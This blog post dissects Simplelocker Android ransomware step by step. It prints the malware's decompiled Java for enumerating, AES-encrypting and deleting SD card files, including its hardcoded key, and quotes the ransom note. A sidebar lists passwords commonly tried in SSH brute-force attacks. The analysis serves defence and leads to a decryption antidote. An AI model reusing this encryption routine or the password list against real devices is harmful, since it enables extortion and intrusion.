Secure Honey

SSH honeypot written in C

How To Dissect Android Simplelocker Ransomware

Monday 16th June 2014 11:56

In this blog post we'll be looking at a new type of malware for Android phones that encrypts important files and demands the user pay a ransom to regain access to their phone.

This is the first reported case of ransomware being used on smartphones so I'm keen to find out more about this new malicious app.

I want to understand what this ransomware does and how it restricts the phone user from accessing files on their SD card. I'll be providing a step-by-step dissection of the malware to provide a clear explanation of how this app carries out its malicious activities.

So before we start the dissection let's look at exactly what Simplelocker is and where it came from.

What is Simplelocker?

First reported by Eset (ESET Analyzes First Android File-Encrypting, TOR-enabled Ransomware) on the 4th June 2014, Simplelocker has one goal: to encrypt certain files on the phone's SD card and then demand cash to decrypt the data - also known as ransomware.

Ransomware is a type of malware that "restricts access to the computer system that it infects, and demands a ransom paid to the creator of the malware in order for the restriction to be removed" (see Wikipedia: Ransomware).

We've seen plenty of cases recently of ransomware infecting computer's (such as CryptoLocker and Cryptowall) but this appears to be the first case of smartphone ransomware in action.

Credit to the following articles for their explanation of the Simplelocker ransomware:

Simple Locker Ransomware Dissection

MD5: fd694cf5ca1dd4967ad6e8c67241114c
SHA256: 8a918c3aa53ccd89aaa102a235def5dcffa047e75097c1ded2dd2363bae7cf97
APK obtained from: contagiominidump.blogspot.in/2014/06/simplocker-android-file-encrypting-tor.html

This post will follow a similar form to the previous post How To Dissect Android Flappy Bird Malware, only I'll assume you've already installed the various tools required for dissection.

The tools I'll be using for this dissection are the same as the previous dissection:

For this dissection I'll still be using dynamic and static analysis, but the approach will be slightly different.

Due to the dangerous nature of ransomware it could be risky to carry out the dynamic analysis first, just in case the ransomware does something malicious to the computer. So I'll be carrying out a basic static analysis in order to determine what the app does and if it's safe to run in a virtual environment, before carrying out the dynamic analysis. I'll then return to the static analysis where we'll look at the code in greater detail and how it carries out the malicious activities.

Basic Static Analysis

The first task is to turn the APK file into a .jar file which we can then open in JD-GUI to see the Java code that's powering the ransomware.

Heading over to the console, we first want to use the tool dex2jar to convert the APK file into a .jar file. The following command should do the trick:

sh /home/user/dex2jar-version/d2j-dex2jar.sh /home/user/simplocker.apk

This should produce a .jar file which you can open in JD-GUI, producing something similar to the screenshot below:

Let's take a brief look at what this app is doing by exploring some of the class files:

In a nutshell this information tells us the following:

  1. This app is looking for images, documents and videos to encrypt. After encrypting the files it will then rename their file extensions to .enc
  2. The app has a C&C (command and control) server on the TOR network
  3. The app collects information about the phone (IMEI, OS, phone model, manufacturer) to send to C&C server
  4. Presumably the C&C server can send decryption instructions to the app

We now have a good overall picture of how this app carries out its ransomware activities. We can also determine that's it's reasonably safe to open this app in the virtual Android environment on DroidBox, so let's move onto the next phase.

Dynamic Analysis

In this phase we want to allow the app to run in a safe environment to confirm whether or not our suspicions from the basic static analysis phase are true.

The main tool we'll use for this phase is DroidDox (refer to the previous post, How To Dissect Android Flappy Bird Malware, for installation instructions)

We'll be working on the command line for this part. Also, remember to export the Android SDK path so we can work from any directory and still have access to the SDK tools:

export PATH=$PATH:/path/to/android-sdk/tools/
export PATH=$PATH:/path/to/android-sdk/platform-tools/

Make sure you have a virtual device setup and ready to deploy in the Android Virtual Device (AVD) manager by entering the command:

android

Heading over to the DroidBox directory, we can now start the Android emulator by entering the following command:

./startemu.sh <AVD name>

Which should open up the virtual Android device with the OS loading, as seen in the screenshot below:

The Android emulator might take a minute or two to fire-up. Once it's ready, enter the following into the command line. This will install Simplelocker onto the virtual device and run the app:

./droidbox.sh simplelocker.apk

Once the app has installed, the virtual Android screen should look like the screenshot below:

This screenshot is the Simplelocker lock screen presented to the user. The text translates from Russian as follows:

WARNING your phone is locked!

The device is locked for viewing and distribution child pornography , zoophilia and other perversions.

To unlock you need to pay 260 UAH.

1. Locate the nearest payment kiosk.

2. Select MoneXy

3. Enter 380982049193.

4. Make deposit of 260 Hryvnia, and then press pay.

Do not forget to take a receipt!

After payment your device will be unlocked within 24 hours.

In case of no PAYMENT YOU WILL LOSE ALL DATA ON your device!

Interestingly, the code to enter (in step 3) appears to be the same every time the app is executed.

Heading back to the command line, DroidBox should have produced an output similar to the screenshot below:

Go ahead and press Ctrl-C to to view the JSON log of data collected while the app was running.

This log shows the use of localhost 127.0.0.1 port 9051 being used for sending and receiving data, the app also accesses a lot of files.

This output didn't prove much because there's no SD card attached to the virtual Android device and therefore no files to encrypt. So let's carry out the experiment again, but this time with some files to be encrypted.

Head back to the AVD manager by entering the command Android on the command line. Open up the settings for the AVD being used for the experiment and enable the SD card with a size of 30 MiB.

The location of this SD card image should be ~/.android/avd//sdcard.img, so the virtual SD card can be mounted by using the following command

mount ~/.android/avd/sdcard.img -o loop /mnt/sdcard

At this point go ahead and copy onto the mounted virtual SD card some sample images ("jpeg", "jpg", "png", "bmp", "gif"), documents ("pdf", "doc", "docx", "txt") and videos ("avi", "mkv", "3gp", "mp4").

Once there are some sample files on the virtual SD card, unmount it by entering the following onto the command line:

umount /mnt/sdcard/

Now we're ready to fire up the AVD and run the app in DroidBox again:

./startemu.sh <AVD name>
./droidbox.sh simplelocker.apk

It might take the AVD a while to encrypt all the files, but after a few minutes stop the AVD and mount the virtual SD card again. All the sample files should have been encrypted and had their extensions renamed to .enc.

So at this point we can confirm that our basic static analysis turned out to be correct: this app encrypts images, documents and videos with pre-determined file extensions.

Static Analysis - Part Two

Having determined what this app does, let's find out how this app carries out its malicious activities by looking at its code in more detail.

The main function being carried out by this app is the file encryption which occurs in the classes FilesEncryptor and AesCrypt. The class FilesEncryptor contains a method called getFileNames():

private void getFileNames(File paramFile)
  {
    File[] arrayOfFile = paramFile.listFiles();
    int i = 0;
    if (i >= arrayOfFile.length)
      return;
    File localFile = new File(paramFile.getAbsolutePath(), arrayOfFile[i].getName());
    if ((localFile.isDirectory()) && (localFile.listFiles() != null))
      getFileNames(localFile);
    while (true)
    {
      i++;
      break;
      String str1 = localFile.getAbsolutePath();
      String str2 = str1.substring(1 + str1.lastIndexOf("."));
      if (this.extensionsToDecrypt.contains(str2))
      {
        this.filesToDecrypt.add(localFile.getAbsolutePath());
        continue;
      }
      if (!Constants.EXTENSIONS_TO_ENCRYPT.contains(str2))
        continue;
      this.filesToEncrypt.add(localFile.getAbsolutePath());
    }
  }

This code extract from the ransomware iterates through all files on the SD card. Line 15 calculates the file extension of each file on the SD card and then line 16 checks if the file extension is in the list of pre-determined file extensions to encrypt (found in the class Constants).

The same class also contains a method called encrypt():

  public void encrypt()
    throws Exception
  {
    AesCrypt localAesCrypt;
    Iterator localIterator;
    if ((!this.settings.getBoolean("FILES_WAS_ENCRYPTED", false)) && (isExternalStorageWritable()))
    {
      localAesCrypt = new AesCrypt("jndlasf074hr");
      localIterator = this.filesToEncrypt.iterator();
    }
    while (true)
    {
      if (!localIterator.hasNext())
      {
        Utils.putBooleanValue(this.settings, "FILES_WAS_ENCRYPTED", true);
        return;
      }
      String str = (String)localIterator.next();
      localAesCrypt.encrypt(str, str + ".enc");
      new File(str).delete();
    }
  }

This method iterates over all the files which were added to the array in the previous method (getFileNames()), as seen on line 9. Each file is encrypted on line 19 where a call is made to the encrypt() method of the AesCrypt class.

The encrypt() method from the AesCrypt class requires two parameters: name/location of file to be encrypted and name/location of the encrypted output file. Line 19 uses the name of the file (as determined by line 18) and then appends the extension .enc to the end of the file to write. Finally, line 20 deletes the original unencrypted file.

The class AesCrypt carries out the actual encryption and decryption of files. It's constructor method is shown below:

  public AesCrypt(String paramString)
    throws Exception
  {
    MessageDigest localMessageDigest = MessageDigest.getInstance("SHA-256");
    localMessageDigest.update(paramString.getBytes("UTF-8"));
    byte[] arrayOfByte = new byte[32];
    System.arraycopy(localMessageDigest.digest(), 0, arrayOfByte, 0, arrayOfByte.length);
    this.cipher = Cipher.getInstance("AES/CBC/PKCS7Padding");
    this.key = new SecretKeySpec(arrayOfByte, "AES");
    this.spec = getIV();
  }

This code snipped shows that the ransomware uses AES encryption using AES/CBC/PKCS7Padding.

The AesCrypt class contains a method called crypt() (as called earlier in FilesEncryptor's encrypt() method), this method is shown below:

  public void encrypt(String paramString1, String paramString2)
    throws Exception
  {
    FileInputStream localFileInputStream = new FileInputStream(paramString1);
    FileOutputStream localFileOutputStream = new FileOutputStream(paramString2);
    this.cipher.init(1, this.key, this.spec);
    CipherOutputStream localCipherOutputStream = new CipherOutputStream(localFileOutputStream, this.cipher);
    byte[] arrayOfByte = new byte[8];
    while (true)
    {
      int i = localFileInputStream.read(arrayOfByte);
      if (i == -1)
      {
        localCipherOutputStream.flush();
        localCipherOutputStream.close();
        localFileInputStream.close();
        return;
      }
      localCipherOutputStream.write(arrayOfByte, 0, i);
    }
  }

This is where the file encryption takes places within the app. Lines 4 and 5 create variables used for the file input and output. Line 6 initialises the cipher (to encrypt data). Line 7 is where the encryption occurs and line 19 writes the encrypted byes to the output file.

Interestingly the same class also contains a method called decrypt() which is very similar to the encrypt() method:

  public void decrypt(String paramString1, String paramString2)
    throws Exception
  {
    FileInputStream localFileInputStream = new FileInputStream(paramString1);
    FileOutputStream localFileOutputStream = new FileOutputStream(paramString2);
    this.cipher.init(2, this.key, this.spec);
    CipherInputStream localCipherInputStream = new CipherInputStream(localFileInputStream, this.cipher);
    byte[] arrayOfByte = new byte[8];
    while (true)
    {
      int i = localCipherInputStream.read(arrayOfByte);
      if (i == -1)
      {
        localFileOutputStream.flush();
        localFileOutputStream.close();
        localCipherInputStream.close();
        return;
      }
      localFileOutputStream.write(arrayOfByte, 0, i);
    }
  }

Obviously this method carries out the decryption on the input file and produces the decrypted output file. The same line numbers from the encrypt() method are highlighted to demonstrate how decryption occurs.

Conclusion

As previously noted by other write-ups about this ransomware: this is more of a proof-of-concept app at the moment and it has yet to be discovered on the Google Play Store. The app is also quite simple to reverse-engineer and no code obfuscation has been used.

This dissection shows how the app encrypts user's files and that information about the phone is sent to a C&C server on the TOR network.

But one important question remains unanswered: would it be possible to decrypt files that have been encrypted by the app without connecting to the C&C server? In other words: can we reverse the damage done by this app?

In the next blog post we'll look at how you can create an antidote for this ransomware.

Edit: as promised, a complete walkthrough on creating the antidote for Simplelocker (which will decrypt the files) is available in the blog post Creating An Antidote For Android Simplelocker Ransomware.

Image credit: "Google Android Amigurumi" by Kham Tran, flickr.com/photos/khamtran/5871541424/.

Comments

Rod

Tue, 17 Jun 2014 02:34:49 +0100

Awesome work!

Roshin

Tue, 17 Jun 2014 12:41:10 +0100

damn! awesome work dude! I've never read such a detailed explanation anywhere! keep up the good work! looking forward to more articles!

Add Comment

Name

Email (won't be displayed)

Website (optional)

Comments

Live Stats (see full stats)

Attempted logins

date range # attempts
today24,102
yesterday5,094
past 7 days98,677
past 30 days1,049,378
all time2,464,699

Top 5 passwords

password # attempts
-5,088
1234564,823
6666663,006
_2,195
admin2,194

Top 5 usernames

username # attempts
root2,425,654
bin1,747
toot1,440
oracle1,421
roort1,385

Stats represent data collected from SSH login attempts on multiple honeypots. Parts of some stats may be filtered to maintain anonymity.

Updated: Sat, 30 Aug 2014 19:01:23 +0100

Live Password Cloud

media 1 rewq pass zzzzzz asdfgh 888 shanghai 000000 f**kyou 336699 qwerty hellO 445566 qwertyu 1234567890 zhang 112233 159357 1qaz2wsx abcdefg zaqxsw 5201314 asdfg 123abc server2000 789456 qqpp q1w2e3r4t5 qazwsxedc 1qazxsw2 qwertyuio 111111 q1w2e3r4 0123456789 q1w2 hacker zxcvbnm scott 456789 zxcv zaq1xsw2 1234567 lanmang 123445 zitian love webmaster ppa5yppp iloveyou 23456 12p30495867 1234qwer 123789 111 topidc 778899 sa adminis qazqaz q1w2e3 123321 zaqxswcde 123456 789789 asdfghjkl aqswdefr welcome 1qaz backup 54321 abcd test 888999 adminpp qweasd 88888888 2008 sqlpp mnbvcxz 123456789 qwer qazxsw 789 7890 qq123456 987654321 qwer1234 123123 qwert idcidc 123 zaqwsx 888888 sasa idc2008 1p203948576 qweasdzxc 666666 abc123 _ chinaidc master root 123456qwerty qwerasdf !@#$%^ idc123 qaz zxcvbn idccom sa890pp 0000 qazwsx system 123654 sapp 654321 111222 1q1q1q xuxulike changeme guest 11111111 147258 power 1qaz2wsx3edc 1234 edong password qwe 1314520 asdf china 1230 abcd1234 windows oracle qwe123 - admin 1q2w3e woaini 35inter 1q2w3e4r5t server2003 zxcvb 147258369 a123456 nimabi 7890pp idc2654321 webserver server 963852741 edongidc 56789 aaaaaa 123qwe p0o9i8u7 secret idc admin123 qwertyuiop 1q2w3e4r user 12qwaszx test123 p sql